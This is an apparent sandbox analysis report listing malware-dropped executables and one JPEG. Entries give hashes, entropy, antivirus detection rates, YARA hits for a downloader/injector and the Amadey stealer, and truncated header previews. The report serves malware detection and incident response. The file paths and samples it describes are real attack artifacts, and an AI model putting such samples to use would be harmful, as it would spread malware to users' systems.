                                                                                                                            Preview:......JFIF.............C....................................................................C.........................................................................8............................................c.........................!.."1A.2Q.#BRaq3br............$4CS...c....%s.....&5DTd..'6EUet....7F.....................................>......................!.1.A..."2Qa.#3q..B....$4...C.DRr.b..............?....{.e..#y.|..,....P.b...?...'(..+....#.....B....:,9=.o5..,.b...M:,rP.w....<.C1......&.....lP....OrP.rZ....P,M.y"...,.....@X..oD..@;: ,......$...P.p.....pg....:.<.......;...8..B.......)..,........a.. ..!.!0..r.P..*.....f.....O..t*...o.'...[.....o`h..4.m|,..G....<<0@.?.F.*R7Sd...e.@.._.@...j..FGy.,..{..0.X..6.h7...E..wF..r..nl.Yp....o....j`..T...Y].7.m.J.a....g..@..,..<L.TD.Ra...u.....BS.\......+><{N8.rA....G..#....n.....F......|#.;....Bs..n6....a..|..5d...g..|.w.4...}...I|....S..>........aRW;~g..y.I4_)....)...(v.w.............]2.k}>P...^...|..=.c.u...V
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):288768
                                                                                                                            Entropy (8bit):6.584915706285476
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:tiaWGvA5BMvdYuAJ2qiGD0swth9Ewaf/s7htn5gYTtic7:t4GvAMdj40th7a3s7SYTtic
                                                                                                                            MD5:7A8E3D000FBA0F5765B98E2D78EB9D12
                                                                                                                            SHA1:2DFF944F970FAEF5C6FA92AC8FBE82C9251553F3
                                                                                                                            SHA-256:13744BE5698FFDDC96D55415FDEEBDE4921ED199B4174251D83F1FD5B5A05C66
                                                                                                                            SHA-512:1D56B0DD129D7A1C1E76B110F9CEE4C63D2F021BCDCACA53CD780CC5E6B6CAFD6CEBC70FB62198910CAE2E4E9EA083216611923C72A4120FCC30CA3894A058DA
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L...G..c.................~..."&.....YN............@...........................(.................................................d.....&.......................(..... ...............................P1..@............................................text....}.......~.................. ..`.data...DX$.........................@....rsrc.........&.....................@..@.reloc...3....(..4...4..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5129728
                                                                                                                            Entropy (8bit):7.738068755959416
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:98304:V127F4DH/LHW+MQ7TZeDTRFh0ZKzXqw8jY:quqkfadIZGXqvjY
                                                                                                                            MD5:2AF03D52F9CF9E53DFFC1183B403E1B7
                                                                                                                            SHA1:124D97058DB289DA50A48F90911BE2D67649F629
                                                                                                                            SHA-256:A41F46EF947C9FF3B1E5625E6CF5799E776A55E48F54F7FFFE19E08E826DE99A
                                                                                                                            SHA-512:7D773C689DC4DD3BE9807C00207CF2713767C77C2B25B9EEB47FA7C0F87E05FA3736D25D79B428771D0FDE6C0F25FCCC476589817AA7FA93E622230E75AD65D8
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\3C54.exe, Author: ditekSHen
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pd.................<N..........ZN.. ...`N...@.. ........................N...........@.................................PZN.K....`N.......................N...................................................... ............... ..H............text....:N.. ...<N................. ..`.rsrc........`N......>N.............@..@.reloc........N......DN.............@..B.................ZN.....H........DN.\............'....N..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):599040
                                                                                                                            Entropy (8bit):7.518690203928315
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:sdhllTZXaG2MjEkQyX7ev9DgST8jIgxATGG56aETtiE:whlf52MjEtyaDrvyAT352EE
                                                                                                                            MD5:917FFF16528EF56F427E0B87261D9DD3
                                                                                                                            SHA1:BC80314877D5E307CB62F87DAB900DEBE4DDD252
                                                                                                                            SHA-256:0119E5129B4785669608345082D862F01474994A566AA8D225A730F4BF38D4D5
                                                                                                                            SHA-512:9B1775B994A952D940582E6CDB7775C06226C196DC0DAABFD35DD61634FDAAA8CD43715D593FF8CB7C23C2B10E140E7E5D5A13BA04588B062FD53AF6B88216FE
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L......a.................6...&&.....YN.......P....@...........................-..............................................:..d.....+......................P-..... ...............................P1..@............................................text....5.......6.................. ..`.data...DX$..P.......:..............@....rsrc.........+......X..............@..@.reloc..&6...P-..8..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):503808
                                                                                                                            Entropy (8bit):7.379104304802616
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:e1z0CQa13pdiPumUtZVUqkj+VOVGakSEPhVHUk9ZuyxPwF7XgivTtiuy:eV0CQa131t1keBSEPHHUSu5tTtiuy
                                                                                                                            MD5:57DD320EAE0FADD155619407C8B5313C
                                                                                                                            SHA1:FC2CE4B86D64025DBBA19BB84E561A27FCB6FFB3
                                                                                                                            SHA-256:4A524E63C81E6CF9AB8A86F8DE0973EA6A6D0973545867D34EBA1B777E238628
                                                                                                                            SHA-512:23F1E1833A6A52D28CCE3B07C726D568C2743B76593E46BA18CD97C7F3F29C262EA3624D7A3F0E745A6F776E0C21421E2A5A7541783FBCF1D31B359843436DDD
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 43%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L.....pb.....................$&.....YN............@.......................... ,.....W...........................................d....@*.......................+..... ...............................P1..@............................................text...z........................... ..`.data...DX$.........................@....rsrc........@*.....................@..@.reloc..@5....+..6...z..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5129728
                                                                                                                            Entropy (8bit):7.738068755959416
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:98304:V127F4DH/LHW+MQ7TZeDTRFh0ZKzXqw8jY:quqkfadIZGXqvjY
                                                                                                                            MD5:2AF03D52F9CF9E53DFFC1183B403E1B7
                                                                                                                            SHA1:124D97058DB289DA50A48F90911BE2D67649F629
                                                                                                                            SHA-256:A41F46EF947C9FF3B1E5625E6CF5799E776A55E48F54F7FFFE19E08E826DE99A
                                                                                                                            SHA-512:7D773C689DC4DD3BE9807C00207CF2713767C77C2B25B9EEB47FA7C0F87E05FA3736D25D79B428771D0FDE6C0F25FCCC476589817AA7FA93E622230E75AD65D8
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\5DA0.exe, Author: ditekSHen
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pd.................<N..........ZN.. ...`N...@.. ........................N...........@.................................PZN.K....`N.......................N...................................................... ............... ..H............text....:N.. ...<N................. ..`.rsrc........`N......>N.............@..@.reloc........N......DN.............@..B.................ZN.....H........DN.\............'....N..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):288768
                                                                                                                            Entropy (8bit):6.584915706285476
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:tiaWGvA5BMvdYuAJ2qiGD0swth9Ewaf/s7htn5gYTtic7:t4GvAMdj40th7a3s7SYTtic
                                                                                                                            MD5:7A8E3D000FBA0F5765B98E2D78EB9D12
                                                                                                                            SHA1:2DFF944F970FAEF5C6FA92AC8FBE82C9251553F3
                                                                                                                            SHA-256:13744BE5698FFDDC96D55415FDEEBDE4921ED199B4174251D83F1FD5B5A05C66
                                                                                                                            SHA-512:1D56B0DD129D7A1C1E76B110F9CEE4C63D2F021BCDCACA53CD780CC5E6B6CAFD6CEBC70FB62198910CAE2E4E9EA083216611923C72A4120FCC30CA3894A058DA
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L...G..c.................~..."&.....YN............@...........................(.................................................d.....&.......................(..... ...............................P1..@............................................text....}.......~.................. ..`.data...DX$.........................@....rsrc.........&.....................@..@.reloc...3....(..4...4..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5129728
                                                                                                                            Entropy (8bit):7.738068755959416
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:98304:V127F4DH/LHW+MQ7TZeDTRFh0ZKzXqw8jY:quqkfadIZGXqvjY
                                                                                                                            MD5:2AF03D52F9CF9E53DFFC1183B403E1B7
                                                                                                                            SHA1:124D97058DB289DA50A48F90911BE2D67649F629
                                                                                                                            SHA-256:A41F46EF947C9FF3B1E5625E6CF5799E776A55E48F54F7FFFE19E08E826DE99A
                                                                                                                            SHA-512:7D773C689DC4DD3BE9807C00207CF2713767C77C2B25B9EEB47FA7C0F87E05FA3736D25D79B428771D0FDE6C0F25FCCC476589817AA7FA93E622230E75AD65D8
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\6FA9.exe, Author: ditekSHen
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pd.................<N..........ZN.. ...`N...@.. ........................N...........@.................................PZN.K....`N.......................N...................................................... ............... ..H............text....:N.. ...<N................. ..`.rsrc........`N......>N.............@..@.reloc........N......DN.............@..B.................ZN.....H........DN.\............'....N..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\NewPlayer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):255488
                                                                                                                            Entropy (8bit):6.3672540076726225
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:W9ynaiEzdOYqdjqqMth9iiry6Q2IbiiRWu1i5bDuPmyye:yWcmAh9ix2r1u1ile
                                                                                                                            MD5:08240E71429B32855B418A4ACF0E38EC
                                                                                                                            SHA1:B180ACE2EA6815775D29785C985B576DC21B76B5
                                                                                                                            SHA-256:A41B4591C7351562ED9125DA2C93DB246E87E05198D2EC0951733D1919E119D8
                                                                                                                            SHA-512:69FA8CAE9BF69BCC498CFD7AF08FCDFD299440BA0DD679835CC8EA14F07B0346F965F88350A5261F2312E046B0DD498B8453D647B5F023762E4265FFA47472BF
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z....D...D...D...E...D...EG..D...E...D2..E...D2..E...D2..E...D...E...D...DE..D|..E...D|..D...D|..E...DRich...D........PE..L....T.c............................u.............@..........................@............@.................................0....................................*..0p..p...................Dq.......p..@...............d............................text............................... ..`.rdata..............................@..@.data....D..........................@....rsrc...............................@..@.reloc...*.......,..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):96926
                                                                                                                            Entropy (8bit):7.918189757438893
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:Cf0zfAYPjM2DR2hqkyycWq4lvY2QcdOrVUxwAQFBG7jZy3X40wzKqRB0QzYubCKa:X7bjM2D08huQcdS0sBGo3Z45znbCK6qe
                                                                                                                            MD5:7D553C2E447C480D12E974789BD25005
                                                                                                                            SHA1:3F3FA3E0E8EC8824DE8C0B9958EDF9D5E2D431BB
                                                                                                                            SHA-256:343F4273AF9F9D7E845AFAE56851D1964F508D239A87796B2BA05BE9B7D695DF
                                                                                                                            SHA-512:BB0268A0F155C0B7D1D7EBE36567B8882BC188D3B94A5640D4224BE8A9309EE5E5CABB63D23EDF76F320D2D825DA4326572FD033F18B8750613468FC33E9104A
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\...x....Mj}9oE...7....*......]..(...x..:.e...+..6..r.....#XP.Q^(.*uz.........G...V_.~....3.c.o.?g.......z.8...Q...9(.Z.'.C...U...5..+....)h...i)M.,c.%}=g._.w.6..i"W!n_. .Z................7.R>\..W.W........gu.8..7-...._....'...^X....+u1......n..J.QKIZ.-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):809984
                                                                                                                            Entropy (8bit):7.646586492015294
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:6aBz+gzWrFGCkY9J22msYEy85LJxg1YSlniLs4CEhtYdGJ+CejE:/z+gzW7Z22byv1YSsA4CpdGJ+I
                                                                                                                            MD5:15BC205C2CAF7196EE2267087C3B2BB8
                                                                                                                            SHA1:0E1EE7E4CCAFD5A62D6B2B3A9369709EAB0E1F0B
                                                                                                                            SHA-256:FDEE1B99A95C5DFB4A256CDB7E43CE3F21A5D2C2977CE252AAFFA77A9E017DDF
                                                                                                                            SHA-512:DBFD1C50D16F21084B542A2ABD2B35F6489D30B55E9B5B8DC9014BCC9C4AE8A24DF08A659B28EAD862291BC65107A34C0CDA8CAD08A354E92FA23138D21F662C
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...........PE..L.....b.................L...H&.....9N.......`....@...........................0.....4.......................................XO..d.......0.....................0..... ................................1..@............................................text....J.......L.................. ..`.data...DX$..`.......P..............@....rsrc...0............n..............@..@.reloc.."8....0..:..."..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5129728
                                                                                                                            Entropy (8bit):7.738068755959416
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:98304:V127F4DH/LHW+MQ7TZeDTRFh0ZKzXqw8jY:quqkfadIZGXqvjY
                                                                                                                            MD5:2AF03D52F9CF9E53DFFC1183B403E1B7
                                                                                                                            SHA1:124D97058DB289DA50A48F90911BE2D67649F629
                                                                                                                            SHA-256:A41F46EF947C9FF3B1E5625E6CF5799E776A55E48F54F7FFFE19E08E826DE99A
                                                                                                                            SHA-512:7D773C689DC4DD3BE9807C00207CF2713767C77C2B25B9EEB47FA7C0F87E05FA3736D25D79B428771D0FDE6C0F25FCCC476589817AA7FA93E622230E75AD65D8
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\9F31.exe, Author: ditekSHen
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pd.................<N..........ZN.. ...`N...@.. ........................N...........@.................................PZN.K....`N.......................N...................................................... ............... ..H............text....:N.. ...<N................. ..`.rsrc........`N......>N.............@..@.reloc........N......DN.............@..B.................ZN.....H........DN.\............'....N..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):809984
                                                                                                                            Entropy (8bit):7.646586492015294
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:6aBz+gzWrFGCkY9J22msYEy85LJxg1YSlniLs4CEhtYdGJ+CejE:/z+gzW7Z22byv1YSsA4CpdGJ+I
                                                                                                                            MD5:15BC205C2CAF7196EE2267087C3B2BB8
                                                                                                                            SHA1:0E1EE7E4CCAFD5A62D6B2B3A9369709EAB0E1F0B
                                                                                                                            SHA-256:FDEE1B99A95C5DFB4A256CDB7E43CE3F21A5D2C2977CE252AAFFA77A9E017DDF
                                                                                                                            SHA-512:DBFD1C50D16F21084B542A2ABD2B35F6489D30B55E9B5B8DC9014BCC9C4AE8A24DF08A659B28EAD862291BC65107A34C0CDA8CAD08A354E92FA23138D21F662C
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...........PE..L.....b.................L...H&.....9N.......`....@...........................0.....4.......................................XO..d.......0.....................0..... ................................1..@............................................text....J.......L.................. ..`.data...DX$..`.......P..............@....rsrc...0............n..............@..@.reloc.."8....0..:..."..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):809984
                                                                                                                            Entropy (8bit):7.646586492015294
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:6aBz+gzWrFGCkY9J22msYEy85LJxg1YSlniLs4CEhtYdGJ+CejE:/z+gzW7Z22byv1YSsA4CpdGJ+I
                                                                                                                            MD5:15BC205C2CAF7196EE2267087C3B2BB8
                                                                                                                            SHA1:0E1EE7E4CCAFD5A62D6B2B3A9369709EAB0E1F0B
                                                                                                                            SHA-256:FDEE1B99A95C5DFB4A256CDB7E43CE3F21A5D2C2977CE252AAFFA77A9E017DDF
                                                                                                                            SHA-512:DBFD1C50D16F21084B542A2ABD2B35F6489D30B55E9B5B8DC9014BCC9C4AE8A24DF08A659B28EAD862291BC65107A34C0CDA8CAD08A354E92FA23138D21F662C
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...........PE..L.....b.................L...H&.....9N.......`....@...........................0.....4.......................................XO..d.......0.....................0..... ................................1..@............................................text....J.......L.................. ..`.data...DX$..`.......P..............@....rsrc...0............n..............@..@.reloc.."8....0..:..."..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):802304
                                                                                                                            Entropy (8bit):7.685061735084475
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:6nRTyItqh7DLUjjuiX+tR+WoXeAWG1qzz5E:8TZta/Uja7siAW
                                                                                                                            MD5:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            SHA1:1E20555089B3D2B9E34B44422C8E6C3061E68F0E
                                                                                                                            SHA-256:D34D06CCD3BA7877664E4769FF708D7C412EE5F43A76F2A2CE962C843CC5C35B
                                                                                                                            SHA-512:A05299352297160D62FB91A75EC7D30E8C00CDAB97BFEF112429B0CED6041A3E6FB232686FF6A4080E9C98797B4D224792C6339600084DED4B12B0595575EDC0
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L....4.a.................N...(&.....YN.......`....@...........................0..............................................Q..d............................`0..... ...............................P1..@............................................text...JL.......N.................. ..`.data...DX$..`.......R..............@....rsrc................p..............@..@.reloc...8...`0..:..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):809984
                                                                                                                            Entropy (8bit):7.646586492015294
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:6aBz+gzWrFGCkY9J22msYEy85LJxg1YSlniLs4CEhtYdGJ+CejE:/z+gzW7Z22byv1YSsA4CpdGJ+I
                                                                                                                            MD5:15BC205C2CAF7196EE2267087C3B2BB8
                                                                                                                            SHA1:0E1EE7E4CCAFD5A62D6B2B3A9369709EAB0E1F0B
                                                                                                                            SHA-256:FDEE1B99A95C5DFB4A256CDB7E43CE3F21A5D2C2977CE252AAFFA77A9E017DDF
                                                                                                                            SHA-512:DBFD1C50D16F21084B542A2ABD2B35F6489D30B55E9B5B8DC9014BCC9C4AE8A24DF08A659B28EAD862291BC65107A34C0CDA8CAD08A354E92FA23138D21F662C
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...........PE..L.....b.................L...H&.....9N.......`....@...........................0.....4.......................................XO..d.......0.....................0..... ................................1..@............................................text....J.......L.................. ..`.data...DX$..`.......P..............@....rsrc...0............n..............@..@.reloc.."8....0..:..."..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):802304
                                                                                                                            Entropy (8bit):7.685061735084475
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:6nRTyItqh7DLUjjuiX+tR+WoXeAWG1qzz5E:8TZta/Uja7siAW
                                                                                                                            MD5:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            SHA1:1E20555089B3D2B9E34B44422C8E6C3061E68F0E
                                                                                                                            SHA-256:D34D06CCD3BA7877664E4769FF708D7C412EE5F43A76F2A2CE962C843CC5C35B
                                                                                                                            SHA-512:A05299352297160D62FB91A75EC7D30E8C00CDAB97BFEF112429B0CED6041A3E6FB232686FF6A4080E9C98797B4D224792C6339600084DED4B12B0595575EDC0
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L....4.a.................N...(&.....YN.......`....@...........................0..............................................Q..d............................`0..... ...............................P1..@............................................text...JL.......N.................. ..`.data...DX$..`.......R..............@....rsrc................p..............@..@.reloc...8...`0..:..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):288768
                                                                                                                            Entropy (8bit):6.584915706285476
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:tiaWGvA5BMvdYuAJ2qiGD0swth9Ewaf/s7htn5gYTtic7:t4GvAMdj40th7a3s7SYTtic
                                                                                                                            MD5:7A8E3D000FBA0F5765B98E2D78EB9D12
                                                                                                                            SHA1:2DFF944F970FAEF5C6FA92AC8FBE82C9251553F3
                                                                                                                            SHA-256:13744BE5698FFDDC96D55415FDEEBDE4921ED199B4174251D83F1FD5B5A05C66
                                                                                                                            SHA-512:1D56B0DD129D7A1C1E76B110F9CEE4C63D2F021BCDCACA53CD780CC5E6B6CAFD6CEBC70FB62198910CAE2E4E9EA083216611923C72A4120FCC30CA3894A058DA
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            Reputation:unknown
